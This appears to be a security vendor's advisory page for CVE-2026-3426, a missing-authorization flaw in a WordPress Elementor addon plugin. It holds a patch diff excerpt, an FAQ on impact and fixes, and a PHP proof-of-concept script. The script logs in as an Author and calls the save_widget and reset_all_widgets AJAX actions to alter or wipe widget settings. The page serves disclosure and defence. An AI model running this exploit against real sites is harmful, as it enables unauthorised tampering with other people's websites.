                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
@@ -249,7 +248,7 @@
                 </div>
             </div>
         </div>
-        <?php foreach ($datas['data_template'] as $data) :
+        <?php foreach ($datas['data_template'] as $data) :
             $manifest = json_decode(file_get_contents($rtmTemplateDir . '/' . $data['hash_id'] . '/manifest.json'));
             $imgurl = $rtmTemplateUrl . '/' . $data['hash_id'] . '/' . $manifest->templates[0]->screenshot;
         ?>
--- a/rometheme-for-elementor/views/modules.php
+++ b/rometheme-for-elementor/views/modules.php
@@ -91,7 +91,7 @@
                 <div id="<?php echo esc_attr($c) ?>" class="card rounded-4  flex-column gap-3">
                     <div class="pb-4 pt-1 border-bottom d-flex align-items-center gap-3">
                         <i class="fa-solid fa-circle" style="font-size: 10px;"></i>
-                        <h4 class="m-0"><?php echo esc_html(ucwords($c)) ?></h4>
+                        <h4 class="m-0"><?php echo esc_html(ucwords($c == 'themebuilder' ? 'Theme Builder' : $c)) ?></h4>
                     </div>
                     <div class="row row-cols-3 g-3">
                         <?php
--- a/rometheme-for-elementor/views/setup-wizard.php
+++ b/rometheme-for-elementor/views/setup-wizard.php
@@ -407,7 +407,7 @@

                     <div class="footer">
                         <button id="next-button" class="btn btn-link" data-next="4">Back</button>
-                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Next</button>
+                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Skip</button>
                     </div>
                 </div>
             </div>
--- a/rometheme-for-elementor/views/sidebar.php
+++ b/rometheme-for-elementor/views/sidebar.php
@@ -26,6 +26,8 @@
 </svg>
 '
 ];
+
+$isProActive = RTMKitCorePlugin::instance()->pro_is_active();
 ?>


@@ -40,32 +42,34 @@
         <div class="menus gap-3">
             <?php foreach ($menus as $section => $items): ?>
                 <div class="menu-section">
-
-                        <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
-                            <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
-                        </button>
-                        <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
-                            <ul class="menu-list">
-                                <?php foreach ($items as $key => $item): ?>
-                                    <li class="menu-item">
-                                        <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
-                                            <?php echo esc_html($item['title']); ?>
-                                        </a>
-                                    </li>
-                                <?php endforeach; ?>
-                            </ul>
-                        </div>
-
+
+                    <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
+                        <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
+                    </button>
+                    <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
+                        <ul class="menu-list">
+                            <?php foreach ($items as $key => $item): ?>
+                                <li class="menu-item">
+                                    <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
+                                        <?php echo esc_html($item['title']); ?>
+                                    </a>
+                                </li>
+                            <?php endforeach; ?>
+                        </ul>
+                    </div>
+
                 </div>
             <?php endforeach; ?>
         </div>
     </div>
     <div class="sidebar-footer">
-        <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
-            <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
-                <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
-            </svg>
-            Go to Pro
-        </a>
+        <?php if (! $isProActive) : ?>
+            <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
+                <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
+                    <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
+                </svg>
+                Go to Pro
+            </a>
+        <?php endif; ?>
     </div>
 </div>
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3426 - RTMKit Addons for Elementor <= 2.0.2 - Authenticated (Author+) Missing Authorization to Widget Configuration Modification

// Configuration: Set these variables before running
$target_url = 'http://example.com';  // Target WordPress site URL
$username = 'author_user';           // WordPress username with Author role
$password = 'author_password';       // WordPress password

// Function to get a valid nonce from the WordPress admin
function get_nonce($url, $cookies) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/admin-ajax.php');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIE, $cookies);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => 'something',  // Dummy action to trigger nonce generation if needed
    ]));
    $response = curl_exec($ch);
    curl_close($ch);
    
    // For most plugins, the nonce is obtained by scraping the admin page
    // Here we assume we can retrieve it via a known AJAX endpoint
    // Actual nonce retrieval may require additional steps
    return null;
}

// Step 1: Login to WordPress to get authentication cookies
echo "[*] Logging in as $username...n";
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);

// Extract cookies from response headers
preg_match_all('/^Set-Cookie:s*([^=]+)=([^;]+)/im', $response, $matches);
$cookies = [];
foreach ($matches[1] as $index => $key) {
    $cookies[] = $key . '=' . $matches[2][$index];
}
$cookie_string = implode('; ', $cookies);

if (empty($cookies)) {
    echo "[!] Login failed or couldn't extract cookies. Exiting.n";
    exit(1);
}
echo "[*] Login successful. Extracted cookies.n";

// Step 2: Get an AJAX nonce (this assumes the nonce is retrievable via some admin endpoint)
// For demonstration, we will attempt to use a static nonce or common pattern.
// In reality, you would need to fetch the nonce from an admin page or use the WordPress REST API.
// For many plugins, the nonce is 'rtmkit_nonce' and the value can be obtained from the admin page.
// This PoC assumes the nonce is known or can be obtained. Adjust as necessary.

// For now, we'll try to get the nonce from the plugin's admin page
$admin_page_url = $target_url . '/wp-admin/admin.php?page=rtmkit';
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $admin_page_url);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_COOKIE, $cookie_string);
$admin_page = curl_exec($ch2);

// Look for the nonce in the page (common pattern: var nonce = '...'; or data-nonce="...")
preg_match('/nonce":"([^"]+)"/', $admin_page, $nonce_match);
if (empty($nonce_match)) {
    preg_match('/vars+rtmkit_nonces*=s*['"]([^'"]+)['"]/', $admin_page, $nonce_match);
}

$nonce = $nonce_match[1] ?? '';

if (empty($nonce)) {
    echo "[!] Could not extract nonce. Attempting with a test payload anyway.n";
    $nonce = 'test_nonce_value';  // Replace with actual nonce if known
}

echo "[*] Nonce obtained: $noncen";

// Step 3: Exploit save_widget() - Modify widget configuration
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Example payload: Disable all widgets or change their settings
// The save_widget() function expects JSON data in the request body
// The options are stored as 'rkit-widget-options' option
$payload = json_encode([
    'widget-id' => 'test-widget',
    'enabled' => '0',  // Disable a specific widget
    'some_setting' => 'malicious value'
]);

echo "[*] Attempting to save malicious widget configuration via save_widget...n";
$ch3 = curl_init();
curl_setopt($ch3, CURLOPT_URL, $ajax_url);
curl_setopt($ch3, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch3, CURLOPT_POST, true);
curl_setopt($ch3, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'save_widget',
    'nonce' => $nonce
]));
curl_setopt($ch3, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'Cookie: ' . $cookie_string
]);
// The JSON payload is sent via raw POST body
curl_setopt($ch3, CURLOPT_CUSTOMREQUEST, 'POST');
// Actually, the code uses file_get_contents('php://input') to read JSON body
// So we need to send the raw JSON in the request body
curl_setopt($ch3, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch3, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Cookie: ' . $cookie_string
]);
$response1 = curl_exec($ch3);
echo "[*] Response from save_widget: $response1n";

// Step 4: Exploit reset_all_widgets() - Reset all widget configurations
$ch4 = curl_init();
curl_setopt($ch4, CURLOPT_URL, $ajax_url);
curl_setopt($ch4, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch4, CURLOPT_POST, true);
curl_setopt($ch4, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'reset_all_widgets',
    'nonce' => $nonce
]));
curl_setopt($ch4, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $cookie_string
]);
$response2 = curl_exec($ch4);
echo "[*] Response from reset_all_widgets: $response2n";

if (strpos($response2, 'success') !== false) {
    echo "[+] Exploit successful! Widget configuration has been reset.n";
} else {
    echo "[-] Exploit may have failed. Check response above.n";
}

curl_close($ch);
curl_close($ch2);
curl_close($ch3);
curl_close($ch4);
?>

Frequently Asked Questions

What is CVE-2026-3426?
Overview of the vulnerability
CVE-2026-3426 is a vulnerability in the RTMKit Addons for Elementor plugin for WordPress, affecting versions up to and including 2.0.2. It allows authenticated users with Author-level access to modify or reset site-wide widget configurations due to missing authorization checks in specific AJAX handler functions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the save_widget() and reset_all_widgets() functions, which do not verify user capabilities beyond checking for a valid nonce. This allows authenticated attackers to send AJAX requests that can alter widget settings without proper permissions.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using the RTMKit Addons for Elementor plugin version 2.0.2 or earlier is affected. Specifically, users with Author-level access can exploit this vulnerability to modify widget configurations.
How can I check if my site is vulnerable?
Steps to verify vulnerability
Check the version of the RTMKit Addons for Elementor plugin installed on your WordPress site. If it is version 2.0.2 or earlier, your site is vulnerable. Additionally, review user roles to identify if any Author-level users have access.
How can I fix this vulnerability?
Applying the patch
To fix CVE-2026-3426, update the RTMKit Addons for Elementor plugin to version 2.0.3 or later, where the vulnerability has been patched. This version includes necessary capability checks to prevent unauthorized modifications.
What are the risks associated with this vulnerability?
Understanding potential impacts
The risk level is classified as Medium, with a CVSS score of 4.3. Successful exploitation can lead to unauthorized changes to site-wide widget configurations, potentially disrupting site functionality and allowing attackers to inject malicious content.
What does the CVSS score mean in practical terms?
Interpreting the severity rating
A CVSS score of 4.3 indicates a medium severity vulnerability, suggesting that while it is not the most critical issue, it still poses a significant threat. Administrators should prioritize addressing it to maintain site integrity and security.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept provided outlines a method for authenticated users to exploit the vulnerability by sending crafted AJAX requests to the WordPress admin-ajax.php endpoint. It illustrates how an attacker can modify widget settings without proper authorization.
What steps can I take to mitigate this vulnerability if I cannot update immediately?
Temporary measures for protection
If immediate updates are not possible, consider restricting Author-level access or monitoring AJAX requests for suspicious activity. Additionally, review user roles and permissions to limit the potential for exploitation.
What should I do if I suspect my site has been compromised?
Responding to potential exploitation
If you suspect exploitation of this vulnerability, immediately review your site’s logs for unauthorized changes, reset affected widget configurations, and update the plugin. Conduct a security audit to ensure no further vulnerabilities exist.
Can this vulnerability affect other plugins or themes?
Scope of the vulnerability
CVE-2026-3426 is specific to the RTMKit Addons for Elementor plugin and does not directly affect other plugins or themes. However, the underlying issue of insufficient authorization checks can be a common vulnerability pattern across various WordPress components.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-3426, refer to the official CVE database or security advisories from WordPress security organizations. Additionally, the plugin’s changelog and support forums may provide updates and community insights.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations